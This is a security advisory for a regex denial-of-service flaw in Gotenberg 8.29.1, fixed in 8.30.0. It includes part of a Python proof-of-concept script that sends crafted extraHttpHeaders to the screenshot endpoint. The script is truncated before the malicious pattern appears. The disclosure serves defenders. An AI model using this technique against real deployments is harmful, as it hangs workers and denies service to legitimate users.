Gotenberg uses dlclark/regexp2 to compile user-supplied scope patterns without setting a proper timeout. Users with access to features using this logic can hang workers indefinitely.
Gotenberg uses dlclark/regexp2 to compile user-supplied scope patterns (gotenberg/pkg/modules/chromium/routes.go:200) with no MatchTimeout set, therefore using the default of math.MaxInt64 = "forever".
For example, any user with access to the endpoint /forms/chromium/screenshot/url can add a crafted scope pattern to the extraHttpHeaders form field using a nested quantifiers that causes infinite backtracking, hanging the Gotenberg worker indefinitely.
See the dlclark/regexp2 README.md for further considerations.
Tested on the latest container version gotenberg/gotenberg:8.29.1
The following Python script uses the /forms/chromium/screenshot/url endpoint, testing for differences in responses times between simple and malicious regexes.
#!/usr/bin/env -S uv run --script
# /// script
# requires-python = ">=3.12"
# dependencies = [
# "requests",
# ]
# ///
import json
import time
import requests
HOST = "localhost:3000"
# HOST = "gotenberg.local:3000"
def send_request(host: str, headers_dict: dict, label: str, timeout: int = 30):
"""Send a screenshot request to Gotenberg and measure response time."""
url = f"http://{host}/forms/chromium/screenshot/url"
print(f"\n[*] {label}")
print(f" extraHttpHeaders: {json.dumps(headers_dict)}")
start = time.time()
try:
r = requests.post(
url,
data={
"url": "http://api.service:3000/snapshot/",
"extraHttpHeaders": json.dumps(headers_dict),
},
files={"a": "b"},
timeout=timeout,
)
elapsed = time.time() - start
print(f" Status: {r.status_code}, Size:...
8.30.0Exploitability
AV:NAC:LAT:NPR:NUI:NVulnerable System
VC:NVI:NVA:HSubsequent System
SC:NSI:NSA:N8.7/CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N